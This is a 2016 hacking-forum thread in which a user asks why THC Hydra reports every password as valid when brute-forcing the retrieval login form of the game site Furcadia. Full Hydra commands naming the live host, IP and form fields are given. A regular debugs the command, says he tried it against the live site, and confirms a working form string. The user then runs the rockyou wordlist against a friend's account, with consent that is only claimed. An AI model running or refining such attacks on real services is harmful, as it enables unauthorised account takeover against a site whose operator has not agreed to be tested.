Hydra All Passwords Valid

A safe place for newbies. You won't get flamed here, as long as you've put in some effort before posting (i.e: Google)...
Post Reply
Jusline
n00b
Posts: 3
Joined: Mon Sep 26, 2016 2:56 pm

Hydra All Passwords Valid

Post by Jusline » Mon Sep 26, 2016 3:05 pm

I'm trying to hack my own account in a game I play called Furcadia. It's a windows client based game, therefore doesn't have a login page. However, it has a page where you can retrieve your character information and such with the username and password.

http://www.furcadia.com/services/retrieve/retrieve.php4

When the login doesn't work, it states "Sorry, the passwords did not match."

My code: hydra -l Butters -P hippo.txt 72.232.1.185 http-form-post "/services/retrieve/retrieve.php4:user_name=^USER^&password=^PASS^:Sorry, the passwords did not match."

This still finds all passwords to be valid.

If the password is correct, it prompts the user to save an ini file. This means I don't have another web page, or "successful login" to add to a different string.

hydra -l Butters -P hippo.txt 72.232.1.185 http-form-post "/services/retrieve/retrieve.php4:user_name=^USER^&password=^PASS^:S=cmd retrieve"

This doesn't work. 0 valid passwords found. I've gone through wireshark, burp suite, and inspect element. I simply cannot figure out for the life of me how to get this to work. I've spent a ton of hours on this, and while it's been fun trying to figure it out I'm starting to get a headache. I appreciate any help in advance. :)

User avatar
Cool_Fire
Not a sandwich
Posts: 1912
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d
Contact:

Re: Hydra All Passwords Valid

Post by Cool_Fire » Mon Sep 26, 2016 4:25 pm

My very first suggestion would be to use the full hostname rather than the IP address.

The server decides which website to load based on the HOST header hydra sends, and if you use the plain IP address, it won't know what website it belongs to and load a default (Which is the wrong one in this case).

There's also some hidden field and a checkbox that you might have to submit. If you can omit these will depend on how the form is handled but you should just be able to add them directly to your hydra command like so;
...ve.php4:cmd=retreive&whatever=else_they_submit&user_name=^USER^...

Side note; It's usually easier to just capture a login attempt with a packet sniffer or a browser plugin rather than trying to work it out by looking at the HTML form.

Edit;
Just tried it to make sure. With "...php4:cmd=retrieve&user_name=^USER^&password=^PASS^:Sorry" it should absolutely work.
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.

Jusline
n00b
Posts: 3
Joined: Mon Sep 26, 2016 2:56 pm

Hydra is giving all sorts of incorrect passwords

Post by Jusline » Thu Sep 29, 2016 1:41 pm

I will have hydra running for 24 hours and it will finally give me a valid password, however that "valid" password is incorrect. I was helped recently in order to get the attack to work in general. It worked on my own account, which had about a password document of 10 words in it. Now I'm testing a password find on my friends account who has approved and didn't make the password too difficult. (I didn't want to find out her actual password in case she uses it everywhere, for her privacy.)

Here is my code:

hydra -l [redacted] -P rockyou.txt http://www.furcadia.com http-form-post "/services/retrieve/retrieve.php4:cmd=retrieve&user_name=^USER^&password=^PASS^:Sorry"

I have also tried:


hydra -l [redacted] -P rockyou.txt http://www.furcadia.com http-form-post "/services/retrieve/retrieve.php4:cmd=retrieve&user_name=^USER^&password=^PASS^:Sorry, the passwords did not match."

Thank you in advance!
Last edited by Cool_Fire on Fri Sep 30, 2016 6:01 am, edited 1 time in total.
Reason: Merged posts and redacted username from commandline

Jusline
n00b
Posts: 3
Joined: Mon Sep 26, 2016 2:56 pm

Re: Hydra is giving all sorts of incorrect passwords

Post by Jusline » Thu Sep 29, 2016 10:52 pm

Not sure if it'll do anything different but I'm trying http-post-form instead of form-post at the moment.

User avatar
Cool_Fire
Not a sandwich
Posts: 1912
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d
Contact:

Re: Hydra All Passwords Valid

Post by Cool_Fire » Fri Sep 30, 2016 6:00 am

It's hard to say why it's telling you the password is valid. I'd first try the user/password manually to see if the response is any different from other passwords when you try it by hand.

Other than that, it may occasionally generate some error which produces a false positive in Hydra. Without logs or packet traces from the actual request Hydra made, it's going to be pretty difficult to find out exactly what happened.
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.

Post Reply